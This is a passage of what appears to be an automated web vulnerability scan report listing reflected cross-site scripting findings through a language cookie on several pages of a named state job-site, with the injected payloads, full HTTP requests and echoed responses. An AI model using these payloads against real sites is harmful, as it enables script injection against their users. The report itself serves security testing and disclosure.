PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN6EC58";ALERT(1)//809999D932E\">
...[SNIP]...

3.229. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_warn_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0fe3"><img%20src%3da%20onerror%3dalert(1)>116f633914f was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as e0fe3"><img src=a onerror=alert(1)>116f633914f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_warn_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=ene0fe3"><img%20src%3da%20onerror%3dalert(1)>116f633914f; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:18 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ene0fe3"><img src=a onerror=alert(1)>116f633914f">
...[SNIP]...

3.230. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_warn_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 206dd"%3balert(1)//d34d3e0b702 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 206dd";alert(1)//d34d3e0b702 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_warn_dsp.cfm?def=false HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en206dd"%3balert(1)//d34d3e0b702; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:16:08 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN206DD";ALERT(1)//D34D3E0B702\">
...[SNIP]...

3.231. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/services/schools/schsearch.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7915"%3balert(1)//5a2f3f874b0 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as a7915";alert(1)//5a2f3f874b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/services/schools/schsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=ena7915"%3balert(1)//5a2f3f874b0; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:27 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENA7915";ALERT(1)//5A2F3F874B0\">
...[SNIP]...

3.232. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/services/schools/schsearch.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90722"><img%20src%3da%20onerror%3dalert(1)>d3b228eaffa was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 90722"><img src=a onerror=alert(1)>d3b228eaffa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/services/schools/schsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en90722"><img%20src%3da%20onerror%3dalert(1)>d3b228eaffa; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:17 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en90722"><img src=a onerror=alert(1)>d3b228eaffa">
...[SNIP]...

3.233. https://www.vermontjoblink.com/ada/works/FAQ.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/FAQ.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b39ba"%3balert(1)//5d5454969d8 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as b39ba";alert(1)//5d5454969d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/works/FAQ.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enb39ba"%3balert(1)//5d5454969d8; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENB39BA";ALERT(1)//5D5454969D8\">
...[SNIP]...

3.234. https://www.vermontjoblink.com/ada/works/FAQ.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/FAQ.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60e38"><img%20src%3da%20onerror%3dalert(1)>49f032b2ef was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 60e38"><img src=a onerror=alert(1)>49f032b2ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/works/FAQ.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en60e38"><img%20src%3da%20onerror%3dalert(1)>49f032b2ef; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:52 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en60e38"><img src=a onerror=alert(1)>49f032b2ef">
...[SNIP]...

3.235. https://www.vermontjoblink.com/ada/works/Login.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/Login.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac724"><img%20src%3da%20onerror%3dalert(1)>da9bad07b8d was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as ac724"><img src=a onerror=alert(1)>da9bad07b8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/works/Login.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=enac724"><img%20src%3da%20onerror%3dalert(1)>da9bad07b8d; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:08 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enac724"><img src=a onerror=alert(1)>da9bad07b8d">
...[SNIP]...

3.236. https://www.vermontjoblink.com/ada/works/Login.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/Login.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49afa"%3balert(1)//3811d504e1 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 49afa";alert(1)//3811d504e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/works/Login.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en49afa"%3balert(1)//3811d504e1; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:09 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
